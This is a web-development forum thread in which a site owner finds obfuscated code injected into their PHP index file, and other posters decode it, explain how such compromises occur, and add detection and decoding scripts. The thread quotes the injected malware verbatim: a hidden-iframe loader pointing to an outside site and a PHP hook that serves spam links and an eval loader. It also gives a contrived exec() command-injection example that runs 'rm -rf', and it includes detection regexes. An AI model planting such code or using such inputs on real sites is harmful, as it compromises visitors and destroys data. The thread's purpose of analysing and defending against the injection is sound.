someone hacked into my files and inserted this code
hi
I am not sure if this is the right section, but the files I am using in my website are written in PHP.
Yesterday, I tried to edit my files and found this code at the end of the index file:
Code:
<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l4963660743084(l4963660743855){ var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));}function l4963660744fc7(l4963660745797){ function l4963660746f0b(){return 2;} var l4963660745f69='';l4963660747eab=String.fromCharCode;for(l4963660746738=0;l4963660746738<l4963660745797.length;l4963660746738+=l4963660746f0b()){ l4963660745f69+=(l4963660747eab(c102916999516l4963660743084(l4963660745797.substr(l4963660746738,l4963660746f0b()))));}return l4963660745f69;} var x60='';var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60+'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x60+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+'5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+'352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+'3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+'125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+'6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+'3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+'352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+'32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+'39253734253739
25336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+'325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+'3726'+x60+'970743E';document.write(l4963660744fc7(l4963660748680));</script>
I asked the hosting service about it and they told me it is either the Google ad script that I had in my website or there are some security holes in the script that I am using. I asked the makers of the script and they assured me that the script is secure.
Can anyone explain this code to me? It is not the first time I have faced this problem; from time to time I find strange code placed at the beginning or at the end of the file.
Please explain the code to me or give me a solution?
I do not know what the above code means, but I do remember encountering a trojan a couple of years ago which put an iframe code like
Code:
<iframe src='http:.....'></iframe>
in all my web pages (irrespective of whether they were PHP, ASP, JSP, ...).
Last edited by stephen84s; Jan 6th, 2009 at 1:24 pm.
"Any fool can write code that a computer can understand. Good programmers write code that humans can understand."
"How to ask questions the smart way ?"
"How to ask questions the smart way ?"
Well using http://www.w3schools.com/js/tryit.as...me=tryjs_alert and some deft editing (replace any document.write() with alert() ).
The big mass of numbers first expands to this text
Code:
<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f%63%68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%34%39%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>
Which in turn expands to this
Code:
<iframe name=c10 src='http://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'></iframe>
Sure ain't a google ad script.
Googling gogo2me reveals a lot of chat, eg.
http://www.sitepoint.com/forums/show...56#post4082556
I'm shocked that your hosting company couldn't do this basic analysis.
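The decoding that the reply above did by hand (pasting the script into a browser sandbox and swapping document.write() for alert()) can be done statically, with nothing from the payload ever reaching a JavaScript engine. The following Python is an added example and is not code from the thread or from any poster. It embeds the layer-2 text exactly as shown above, re-encodes it into the layer-1 shape found in index.php (uppercase hex chunks spliced with '+x60+', where x60 is the empty string) as constructed test input, and then decodes both layers back down to the hidden iframe. Function names are my own.

```python
"""Static decoding of the injected <script> quoted in this thread.

Added example (not from the thread or any poster). Two encoding layers:
  Layer 1: a hex string spliced together with '+x60+' (x60 is ''), which the
           injected decoder reads two characters at a time via parseInt(chunk, 16).
  Layer 2: document.write(unescape('%3c%69...')), i.e. percent-encoding of the
           final hidden <iframe>.
"""
import re
import urllib.parse

# Layer-2 text exactly as the reply above shows it (the output of layer 1).
LAYER2_FROM_THREAD = (
    "<script>if(!myia){document.write(unescape( '"
    "%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27"
    "%68%74%74%70%3a%2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f"
    "%63%68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%34%39%20"
    "%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%65%3d%27%76%69%73%69"
    "%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d"
    "%65%3e'));}var myia=true;</script>"
)


def strip_concat(js_literal: str) -> str:
    """Undo the "'3C736'+x60+'3726'+..." splicing, drop any line-wrap
    whitespace from a pasted copy, and return the bare hex string."""
    joined = re.sub(r"'\s*\+\s*x60\s*\+\s*'", "", js_literal)
    return re.sub(r"\s+", "", joined).strip("'")


def decode_hex_pairs(hexstr: str) -> str:
    """Equivalent of the injected decoder loop: each 2-char chunk is
    parseInt(chunk, 16), then String.fromCharCode of that value."""
    if len(hexstr) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", hexstr):
        raise ValueError("not an even-length hex string")
    return bytes.fromhex(hexstr).decode("latin-1")


def decode_unescape_calls(js: str) -> list:
    """Percent-decode every unescape('...') argument found in the script
    (JS unescape semantics for %XX; %uXXXX is not used by this sample)."""
    args = re.findall(r"unescape\(\s*'([^']*)'\s*\)", js)
    return [urllib.parse.unquote(arg) for arg in args]


def iframe_sources(html: str) -> list:
    """Pull the src of every <iframe> in a decoded fragment."""
    return re.findall(r"<iframe[^>]*\bsrc=['\"]?([^'\"\s>]+)", html, flags=re.I)


def deobfuscate(layer1_literal: str) -> dict:
    """Run all layers and keep what each one produced for comparison."""
    layer2 = decode_hex_pairs(strip_concat(layer1_literal))
    layer3 = decode_unescape_calls(layer2)
    return {
        "layer2": layer2,
        "layer3": layer3,
        "iframe_src": [src for frag in layer3 for src in iframe_sources(frag)],
    }


def build_layer1_sample(script: str, split_every: int = 5) -> str:
    """Constructed test input: re-encode a script into the shape of the
    injected layer-1 literal (uppercase hex chunks joined with '+x60+').
    Exists only so the decoder can be exercised offline on known input."""
    hexstr = script.encode("latin-1").hex().upper()
    chunks = [hexstr[i:i + split_every] for i in range(0, len(hexstr), split_every)]
    return "'" + "'+x60+'".join(chunks) + "'"


if __name__ == "__main__":
    result = deobfuscate(build_layer1_sample(LAYER2_FROM_THREAD))
    print("layer 2:", result["layer2"][:60], "...")
    print("layer 3:", result["layer3"])
    print("hidden iframe loads:", result["iframe_src"])
```

Each layer's output is retained rather than only the final iframe, so the decoded text can be compared line by line with what was actually found in the file; a decoder that only prints the end result makes it easy to miss a second payload hidden in an intermediate layer.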
thanks very much for the reply
In the last two days I kept getting the code in the index.php file. I removed it both times and changed the permission of the folder containing it, but with the same result (I get the code again).
I contacted the hosting company about the issue once again and received this general advice:
1. Set register_globals to OFF.
2. Turn off Display Error/Warning Messages. Set error_display to ZERO.
3. Never run unescaped queries.
4. Validate all user inputs. Items on Forms, in URLs and so on.
5. Move Config and files containing Passwords to mysql to a Secure directory outside of the public_html folder.
6. Change permissions on any configuration files containing private information such as database passwords or email accounts to 440 so they cannot be written to and so there are no world permissions. If you need to edit them at a later time you will need to change it back to 640.
7. Access Control. You don't want your user to have access to Admin functions or Clean up scripts.
8. htaccess is your friend; use it to deny people (we also have an easy deny manager in the cpanel).
9. PHP can parse any valid script, whether it is called foo.php, very_long_name.php.php.php, or even willeymtard.bat. Using the default extension of ".php" means that before your hackers start you have already told them you are using PHP. As mentioned, you can use any filename for your scripts - if you are using PHP for every script on your server, consider using the ".html" extension for your scripts and making PHP parse HTML files. You can change your file extension by adding this line to the htaccess or turn it on via the add type handler in the cpanel (AddType application/x-httpd-php .php).
10. To protect against SQL injection attacks: Sometimes hackers will try to screw up your database by inserting SQL code into your form input fields. They can, for example, insert code that could delete all the data in your database! To protect against this, you need to use this PHP function: mysql_real_escape_string(). This function escapes (makes safe) any special characters in a string (programmers call text a 'string') for MySQL. Example: $name = $_REQUEST['name']; $safe_name = mysql_real_escape_string($name); Now you know the variable $safe_name is safe to use with your SQL code.
11. Keep the PHP code to yourself. If anyone can see it they can exploit vulnerabilities. You should take care to store your PHP files and the necessary passwords to access your MySQL databases in protected files or folders. The easy way to do this is to put the database access passwords in a file with a .inc.php extension (such as config.inc.php), and then place this file in a directory which is above the server's document root (and thus not accessible to surfers of your site), and refer to the file in your PHP code with a require_once command. By doing things this way, your PHP code can read the included file easily but hackers will find it almost impossible to hack your site.
The script that I am using applies most of them and I still get the code in my website.
Can anyone tell me how to get rid of it (forever)?
Last edited by khr2003; Jan 8th, 2009 at 9:36 pm.
thanks for the reply
Can you explain to me what compromise means in terms of servers (what happens if the server is compromised?).
Also, let's assume that I did not give the right permissions to the folders; how is it that another user or surfer can hack into my files?
Additionally, I checked my website today and found this code inserted at the top of the index page:
Code:
<?php @register_shutdown_function("__sfd1231485604__");function __sfd1231485604__() { global $__sdv1231485604__; if (!empty($__sdv1231485604__)) return; $__sdv1231485604__=1; echo <<<DOC__DOC <!-- [3dedcad5052d8b1262f3980666421084 --><div class="__wp_footer"><ul><li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=971">maxaquin without a prescription</a></li> <li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=985">purchase maxaquin online</a></li> <li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=1134">discount maxaquin online</a></li> <li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=2921">maxaquin cod</a></li> <li><a <script type="text/javascript"><!-- google_ad_client = "pub-7652328300112265"; google_ad_width = 728; google_ad_height = 15; google_ad_format = "728x15_0ads_al_s"; google_ad_channel = ""; function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str);} google_ads("http://pagead2.googlesyndication.com/pagead/show_ads.js…script><!-- 3dedcad5052d8b1262f3980666421084] --> DOC__DOC; } ?>
And this at the bottom of the page:
Code:
<?php error_reporting(0); echo "\n"; @__sfd1231485604__(); ?>
Can someone tell me how this code gets inserted into my files, and why is it inserted at the top and the bottom of the file and not, for instance, in the middle of it?
Sorry for the trouble, but I am kind of new to all this stuff.
Last edited by khr2003; Jan 9th, 2009 at 4:34 am.
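A read-only scanner for the markers quoted in this thread, as an added example (not code from the thread or from any poster). It flags the hidden iframe, the document.write(unescape(...)) loader, the '+x60+' hex splice, the __sfd...__ shutdown hook and the silenced call to it, and reports whether each hit sits at the top, bottom or middle of the file, which is the layout the post above describes. The sample file contents and the spam.invalid URL are constructed for the demonstration; the __sfd1231485604__ name is the one quoted above. Nothing is modified on disk.

```python
"""Read-only scan of web files for the injection markers reported in this thread.

Added example, not from the thread or any poster. The regexes are derived from
the injected code quoted above; sample contents below are constructed.
"""
import re
import sys
from pathlib import Path

MARKERS = [
    ("hidden_iframe",   re.compile(r"<iframe[^>]*visibility\s*:\s*hidden", re.I)),
    ("write_unescape",  re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)),
    ("hex_splice_x60",  re.compile(r"'\+x60\+'")),
    ("shutdown_hook",   re.compile(r"register_shutdown_function\s*\(\s*[\"']__sfd\d+__")),
    ("silenced_footer", re.compile(r"error_reporting\s*\(\s*0\s*\)\s*;.*@__sfd\d+__\s*\(\s*\)")),
    ("spam_link_block", re.compile(r'class="__wp_footer"')),
]


def position(line_no: int, total: int) -> str:
    """Classify where a hit sits; the thread's injections were on the first
    and last lines of index.php, so top/bottom hits are the ones to expect."""
    if line_no <= 2:
        return "top"
    if line_no >= total - 1:
        return "bottom"
    return "middle"


def scan_text(text: str) -> list:
    """Return (marker, line_no, position) for every marker hit, in file order."""
    lines = text.splitlines()
    hits = []
    for no, line in enumerate(lines, start=1):
        for name, rx in MARKERS:
            if rx.search(line):
                hits.append((name, no, position(no, len(lines))))
    return hits


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".inc")) -> dict:
    """Scan every web-facing file under root; map path -> hits (files with hits only)."""
    found = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                found[str(path)] = hits
    return found


# Constructed stand-in for an infected index.php: the first and last lines
# mirror the injected code quoted in the thread; the middle is placeholder code.
SAMPLE_INFECTED = "\n".join([
    '<?php @register_shutdown_function("__sfd1231485604__"); function __sfd1231485604__() '
    '{ echo \'<div class="__wp_footer"><a href="http://spam.invalid/">spam</a></div>\'; } ?>',
    "<?php",
    "require_once 'config.inc.php';  // placeholder for the site's own code",
    "echo '<h1>Welcome</h1>';",
    "?>",
    "<p>Site content</p>",
    "<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>",
    '<?php error_reporting(0); echo "\\n"; @__sfd1231485604__(); ?>',
])

# Constructed clean file: the same placeholder code with nothing prepended or appended.
SAMPLE_CLEAN = "<?php\nrequire_once 'config.inc.php';\necho '<h1>Welcome</h1>';\n?>\n<p>Site content</p>\n"


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            print(path, hits)
    else:
        print("infected sample:", scan_text(SAMPLE_INFECTED))
        print("clean sample:", scan_text(SAMPLE_CLEAN))
```

Run it with a directory argument to walk real files, or with none to see the constructed samples. Re-running it after a cleanup is a cheap way to confirm whether the files were re-infected, which is the situation the post above describes, and the line positions it reports tell you whether a new copy matches the same top-and-bottom layout.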
Scripts are usually chmod 755 (google it) so the permissions will be set 'correctly', at least in that no non-privileged user can edit your files (e.g. an FTP guest). It isn't necessary for the server root password to be compromised for this kind of thing to happen - anyone with your user access can of course modify the files. Since scripts run with the permissions of your user account, that means any executed script on your site can, potentially, edit/delete/create any script/file/folder/config that you can.
The most usual way that this happens is a dodgy script with a security vulnerability. As a trivial, contrived example, imagine this being in a PHP script:
exec ($_GET['somevar']);
and now imagine a user accessing your page with:
http://yourdomain.tld/page.php?somevar=rm%20-rf&
this would politely ask the PHP script (running as your user, remember) to delete all files and folders in the script's current directory. Simple, eh?
Obviously, you won't do something like this deliberately, or something this obviously stupid, but variations on this pattern basically allow someone access to everything that you can access, from a browser, without ever needing your (or anyone else's) password.
Now, do you use some kind of prefab PHP application on your site? Because it's highly unlikely that the kind of attack I just outlined would occur with home-made code, since no-one would be able to see what the site's code actually does (which then would suggest that maybe someone does have your or someone else's pw). But, if you use a prefab application, the vulnerabilities are well known by everyone, and that's obviously risky. So.. if you're using forum software, for example, generally avoid 'plugins' and even 'themes' unless you really trust the makers to code to as high a security standard as the makers of the forum software...
Last edited by MattEvans; Jan 10th, 2009 at 4:23 am.
Plato forgot the nullahedron..
Also, (I forgot to mention) changing the permissions of a file to anything won't protect you from that kind of attack, since your user account can always change the permissions of your own files; if someone can execute shell ("command line") code, they can just chmod the relevant files to what they want first.
The best way to protect yourself from this kind of thing is, obviously, to use high quality scripts. You can also run scripts with lower privileges than your own, if you're still worried. Unfortunately, you need to be able to create new user accounts on the server and edit the server config to do that, and most service providers won't allow you to do that with a basic hosting package.
You have checked the obvious, right? That your FTP or control panel password hasn't been leaked/stolen/hacked? You should be able to check FTP access logs (look for unknown IPs logging in as you). But you may only be able to get access to the logs by asking your hosting provider for them, since they'd be global logs (for all customers).
Views: 3493 | Replies: 12